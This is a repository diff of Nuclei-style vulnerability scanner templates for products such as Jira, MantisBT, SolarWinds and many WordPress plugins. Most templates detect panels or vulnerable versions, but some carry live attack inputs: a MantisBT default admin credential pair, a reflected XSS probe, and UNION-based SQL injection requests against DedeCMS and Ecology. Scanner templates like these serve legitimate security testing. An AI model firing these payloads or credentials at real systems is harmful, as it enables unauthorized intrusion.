jira-unauthenticated-projects - info: name: Jira Unauthenticated Projects author: TechbrunchFR - severity: low - + severity: info + tags: atlassian,jira requests: - method: GET path: diff --git a/poc/atlassian/jira_user_piker (copy 1).yaml b/poc/atlassian/jira_user_piker (copy 1).yaml index 24a41bc721..0a88ec36aa 100644 --- a/poc/atlassian/jira_user_piker (copy 1).yaml +++ b/poc/atlassian/jira_user_piker (copy 1).yaml @@ -2,14 +2,21 @@ id: jira-unauthenticated-user-picker info: name: Jira Unauthenticated User Picker - author: medbsq - severity: medium + author: TechbrunchFR + severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira -requests: +http: - method: GET path: - - "{{BaseURL}}/rest/api/user/picker?query=admin" + - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" + matchers: - - type: status - status: - - 200 \ No newline at end of file + - type: word + words: + - 'user-picker' + +# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira_user_piker.yaml b/poc/atlassian/jira_user_piker.yaml index d1c65be6c6..24a41bc721 100644 --- a/poc/atlassian/jira_user_piker.yaml +++ b/poc/atlassian/jira_user_piker.yaml @@ -1,13 +1,15 @@ id: jira-unauthenticated-user-picker + info: name: Jira Unauthenticated User Picker author: medbsq severity: medium + requests: - method: GET path: - "{{BaseURL}}/rest/api/user/picker?query=admin" matchers: - type: status - status: - - 200 + status: + - 200 \ No newline at end of file diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml new file mode 100644 index 0000000000..4ffeb88644 --- /dev/null +++ b/poc/auth/Mantis-Default_login.yaml @@ -0,0 +1,46 @@ +id: mantisbt-default-credential + +info: + name: MantisBT Default Admin Login + author: For3stCo1d + severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mantisbt,default-login + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + return=index.php&username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - administrator + pass: + - root + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/dell-openmanager-login-6948.yaml b/poc/auth/dell-openmanager-login-6948.yaml new file mode 100644 index 0000000000..0f686806d6 --- /dev/null +++ b/poc/auth/dell-openmanager-login-6948.yaml @@ -0,0 +1,27 @@ +id: dell-openmanager-login + +info: + name: Dell OpenManage Switch Administrator + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22 + tags: panel,dell + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/config/authentication_page.htm' + + matchers-condition: or + matchers: + - type: word + words: + - '
Powered by '
- ''
condition: and
+
- type: status
status:
- 200
+
extractors:
- type: regex
part: body
group: 1
regex:
- 'com">SkyCaiji<\/a> ([A-Z0-9.]+) 后台管理<\/p>'
+# digest: 4b0a004830460221009ce109dadd530fb2af3ec5f982fad37cb2a53cf79752ace82cc7042566d296aa022100b9dc09fce81f03f4d0a545b8b4e59c0eafc221da4b1889b6d2f535e7069af3cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/other/solarwinds-orion-10357.yaml b/poc/other/solarwinds-orion-10357.yaml
index ed83c87d2b..9ab0d7bad7 100644
--- a/poc/other/solarwinds-orion-10357.yaml
+++ b/poc/other/solarwinds-orion-10357.yaml
@@ -1,15 +1,16 @@
id: solarwinds-orion
+
info:
name: SolarWinds Orion Panel
author: puzzlepeaches
severity: info
- tags: panel
+ tags: panel,solarwinds
+
requests:
- method: GET
path:
- "{{BaseURL}}/Orion/Login.aspx"
- headers:
- User-Agent: "Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0"
+
matchers:
- type: word
words:
diff --git a/poc/other/sonarqube-public-projects-10379.yaml b/poc/other/sonarqube-public-projects-10379.yaml
index 8fbf957e16..a2aad16212 100644
--- a/poc/other/sonarqube-public-projects-10379.yaml
+++ b/poc/other/sonarqube-public-projects-10379.yaml
@@ -1,28 +1,23 @@
id: sonarqube-public-projects
-
info:
name: Sonarqube with public projects
author: sickwell
severity: low
tags: sonarqube,misconfig
reference: https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true
-
requests:
- method: GET
path:
- "{{BaseURL}}/api/components/suggestions?recentlyBrowsed="
-
matchers-condition: and
matchers:
-
- type: status
status:
- 200
-
- type: word
words:
- '"results":'
- '"items":'
- '"more":'
part: body
- condition: and
\ No newline at end of file
+ condition: and
diff --git a/poc/other/sonicwall-sslvpn-panel-10390.yaml b/poc/other/sonicwall-sslvpn-panel-10390.yaml
index 8f24565d45..4025c28287 100644
--- a/poc/other/sonicwall-sslvpn-panel-10390.yaml
+++ b/poc/other/sonicwall-sslvpn-panel-10390.yaml
@@ -1,9 +1,11 @@
id: sonicwall-sslvpn-panel
+
info:
name: SonicWall Virtual Office SSLVPN Panel
author: PR3R00T
severity: info
- tags: panel
+ tags: panel,sonicwall
+
requests:
- method: GET
path:
diff --git a/poc/other/splunk-enterprise-panel-10414.yaml b/poc/other/splunk-enterprise-panel-10414.yaml
index c88257a6d6..af5162d861 100644
--- a/poc/other/splunk-enterprise-panel-10414.yaml
+++ b/poc/other/splunk-enterprise-panel-10414.yaml
@@ -1,30 +1,22 @@
id: splunk-enterprise-panel
+
info:
- name: Splunk Enterprise Panel Detect
+ name: Splunk Enterprise Panel
author: praetorian-thendrickson
severity: info
- reference: https://www.splunk.com/en_us/software/splunk-enterprise.html
- metadata:
- shodan-query: http.title:"Login - Splunk"
+ reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22
tags: panel,splunk
+
requests:
- method: GET
path:
- '{{BaseURL}}/en-US/account/login'
redirects: true
+
matchers-condition: and
matchers:
- type: word
words:
- 'Splunk Inc.'
- - type: status
- status:
- - 200
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '"version": "(.*)"'
- - 'versionNumber": "([0-9.]+)"'
- - '"VERSION_LABEL": "([0-9.]+)"'
+ - 'splunkd'
+ - 'Splunk Enterprise'
diff --git a/poc/other/spoofable-spf-records-ptr-10426.yaml b/poc/other/spoofable-spf-records-ptr-10426.yaml
index 993131749a..48815cf189 100644
--- a/poc/other/spoofable-spf-records-ptr-10426.yaml
+++ b/poc/other/spoofable-spf-records-ptr-10426.yaml
@@ -1,4 +1,5 @@
id: spoofable-spf-records-ptr
+
info:
name: Spoofable SPF Records with PTR Mechanism
author: binaryfigments
@@ -9,9 +10,11 @@ info:
classification:
cwe-id: CWE-200
tags: dns,spf
+
dns:
- name: "{{FQDN}}"
type: TXT
+
matchers:
- type: word
words:
diff --git a/poc/other/sugarcrm-panel-10571.yaml b/poc/other/sugarcrm-panel-10571.yaml
index c76645fdf8..b631adf067 100644
--- a/poc/other/sugarcrm-panel-10571.yaml
+++ b/poc/other/sugarcrm-panel-10571.yaml
@@ -1,19 +1,15 @@
id: sugarcrm-panel
-
info:
name: Detect SugarCRM Panel
author: johnk3r
severity: info
- metadata:
- shodan-query: http.title:sugarcrm
+ reference: https://www.shodan.io/search?query=sugarcrm
tags: sugarcrm,panel
-
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/index.php?action=Login&module=Users"
-
stop-at-first-match: true
matchers-condition: and
matchers:
@@ -21,7 +17,6 @@ requests:
part: body
words:
- "":""}]'
+ - facebook
+ - twitter
+ - type: word
+ part: header
+ negative: true
+ words:
+ - application/json
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]='
+ method: GET
diff --git a/poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml b/poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml
new file mode 100644
index 0000000000..fb4e753986
--- /dev/null
+++ b/poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml
@@ -0,0 +1,59 @@
+id: simple-social-share-7fcd52af02923c5f69d82802a271c940
+
+info:
+ name: >
+ Simple Social Share <= 3.0 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b066f1fe-b416-4fe8-891d-b9c33664df89?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-social-share/"
+ google-query: inurl:"/wp-content/plugins/simple-social-share/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-social-share,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-social-share/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-social-share"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0')
\ No newline at end of file
diff --git a/poc/social/twitter-secret-11870.yaml b/poc/social/twitter-secret-11870.yaml
index 824660405a..e7052b9a1a 100644
--- a/poc/social/twitter-secret-11870.yaml
+++ b/poc/social/twitter-secret-11870.yaml
@@ -1,14 +1,16 @@
id: twitter-secret
+
info:
name: Twitter Secret
- author: gaurang,daffainfo
+ author: gaurang
severity: medium
tags: token,file,twitter
+
file:
- extensions:
- all
+
extractors:
- type: regex
regex:
- "(?i)twitter(.{0,20})?[0-9a-z]{35,44}"
- - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}"
diff --git a/poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml b/poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml
new file mode 100644
index 0000000000..7d4dc5956d
--- /dev/null
+++ b/poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml
@@ -0,0 +1,59 @@
+id: ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6
+
+info:
+ name: >
+ Social Media & Share Icons <= 2.9.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/95f1b5ca-5110-407a-8fbb-375ac445294b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-social-media-icons/"
+ google-query: inurl:"/wp-content/plugins/ultimate-social-media-icons/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-social-media-icons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-social-media-icons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-social-media-icons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.1')
\ No newline at end of file
diff --git a/poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml b/poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml
new file mode 100644
index 0000000000..4d27105978
--- /dev/null
+++ b/poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml
@@ -0,0 +1,59 @@
+id: woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a
+
+info:
+ name: >
+ WooCommerce Social Login <= 2.6.3 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1e51951-0e4c-44f3-a11b-13c0be984a7f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woo-social-login/"
+ google-query: inurl:"/wp-content/plugins/woo-social-login/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woo-social-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-social-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-social-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.3')
\ No newline at end of file
diff --git a/poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml b/poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml
new file mode 100644
index 0000000000..ffeb71d947
--- /dev/null
+++ b/poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e
+
+info:
+ name: >
+ WP Font Awesome <= 1.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The WP Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping on 'icon' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/59ee0b56-c11f-4951-aac0-8344200e4484?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2023-5127
+ metadata:
+ fofa-query: "wp-content/plugins/wp-font-awesome/"
+ google-query: inurl:"/wp-content/plugins/wp-font-awesome/"
+ shodan-query: 'vuln:CVE-2023-5127'
+ tags: cve,wordpress,wp-plugin,wp-font-awesome,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-font-awesome/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-font-awesome"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.9')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml b/poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml
new file mode 100644
index 0000000000..c75d21759f
--- /dev/null
+++ b/poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4
+
+info:
+ name: >
+ Event post <= 5.9.5 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing nonce check on the save_bulkdatas function in all versions up to, and including, 5.9.5. This makes it possible for unauthenticated attackers to update post_meta_data via a forged request, granted they can trick a logged-in user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-1375
+ metadata:
+ fofa-query: "wp-content/plugins/event-post/"
+ google-query: inurl:"/wp-content/plugins/event-post/"
+ shodan-query: 'vuln:CVE-2024-1375'
+ tags: cve,wordpress,wp-plugin,event-post,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-post/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "event-post"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.9.5')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml b/poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml
new file mode 100644
index 0000000000..81a0a6d6c4
--- /dev/null
+++ b/poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd
+
+info:
+ name: >
+ Premium Addons for Elementor <= 4.10.36 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 4.10.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 4.10.36 and fully patched in version 4.10.37.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9ed80507-f3e5-45a8-9498-8cebf97155ff?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-6340
+ metadata:
+ fofa-query: "wp-content/plugins/premium-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-6340'
+ tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "premium-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.10.36')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml b/poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml
new file mode 100644
index 0000000000..b7c0e62410
--- /dev/null
+++ b/poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11
+
+info:
+ name: >
+ Image Optimizer, Resizer and CDN – Sirv <= 7.2.7 - Authenticated(Subscriber+) Missing Authorization to Plugin Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to unauthorized plugin settings modification due to missing capability checks on the plugin functions in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the connected Sirv account to an attacker-controlled one.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/229490c3-d820-4831-b105-a429512c2c60?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-6392
+ metadata:
+ fofa-query: "wp-content/plugins/sirv/"
+ google-query: inurl:"/wp-content/plugins/sirv/"
+ shodan-query: 'vuln:CVE-2024-6392'
+ tags: cve,wordpress,wp-plugin,sirv,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sirv/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sirv"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.2.7')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml b/poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml
new file mode 100644
index 0000000000..601fe77291
--- /dev/null
+++ b/poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6588-af347ddbbf742df5b2786c5ede788153
+
+info:
+ name: >
+ PowerPress Podcasting plugin by Blubrry <= 11.9.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via media_url Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The PowerPress Podcasting plugin by Blubrry plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘media_url’ parameter in all versions up to, and including, 11.9.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/745262f6-4f73-453e-b650-15115536f221?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-6588
+ metadata:
+ fofa-query: "wp-content/plugins/powerpress/"
+ google-query: inurl:"/wp-content/plugins/powerpress/"
+ shodan-query: 'vuln:CVE-2024-6588'
+ tags: cve,wordpress,wp-plugin,powerpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/powerpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "powerpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 11.9.10')
\ No newline at end of file
diff --git a/poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml b/poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml
new file mode 100644
index 0000000000..7f223d665a
--- /dev/null
+++ b/poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml
@@ -0,0 +1,59 @@
+id: counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac
+
+info:
+ name: >
+ Counterpoint <= 1.8.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0975cc9d-7130-4802-bba2-b52d4b79edcd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/counterpoint/"
+ google-query: inurl:"/wp-content/themes/counterpoint/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,counterpoint,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/counterpoint/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "counterpoint"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.1')
\ No newline at end of file
diff --git a/poc/sql/dedecms-membergroup-sqli-6796.yaml b/poc/sql/dedecms-membergroup-sqli-6796.yaml
index 603eb805a9..6ab43810d6 100644
--- a/poc/sql/dedecms-membergroup-sqli-6796.yaml
+++ b/poc/sql/dedecms-membergroup-sqli-6796.yaml
@@ -1,21 +1,27 @@
id: dedecms-membergroup-sqli
+
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
- reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
+ reference:
+ - http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
+
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
+
matchers-condition: and
matchers:
+
- type: word
words:
- "52c69e3a57331081823331c4e69d3f2e"
part: body
+
- type: status
status:
- 200
diff --git a/poc/sql/ecology-syncuserinfo-sqli-7177.yaml b/poc/sql/ecology-syncuserinfo-sqli-7177.yaml
index 77ccaabf31..ab5309607b 100644
--- a/poc/sql/ecology-syncuserinfo-sqli-7177.yaml
+++ b/poc/sql/ecology-syncuserinfo-sqli-7177.yaml
@@ -1,25 +1,39 @@
id: ecology-syncuserinfo-sqli
+
info:
- name: Ecology Syncuserinfo Sqli
+ name: Ecology Syncuserinfo - SQL Injection
author: ritikchaddha
- severity: high
+ severity: critical
+ description: Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.weaver.com.cn/
+ - https://github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cwe-id: CWE-89
metadata:
+ max-request: 1
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
- redirects: true
+
+ host-redirects: true
max-redirects: 2
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- "4386499557"
+
- type: status
status:
- 200
+
+# digest: 4a0a0047304502207c7fdd7332a97f18ef506df96a746a9b815d76ae5c170f26537e3194eb09e907022100ad8b614f3075221e0152d3b945f6685ece46e871c092f46f7e01bec6a6be1dc4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/ecshop-sqli-7180.yaml b/poc/sql/ecshop-sqli-7180.yaml
index fbb70eb64c..47a60acc94 100644
--- a/poc/sql/ecshop-sqli-7180.yaml
+++ b/poc/sql/ecshop-sqli-7180.yaml
@@ -1,5 +1,4 @@
id: ecshop-sqli
-
info:
name: ECShop 2.x/3.x SQL Injection
author: Lark-lab,ImNightmaree,ritikchaddha
@@ -15,7 +14,6 @@ info:
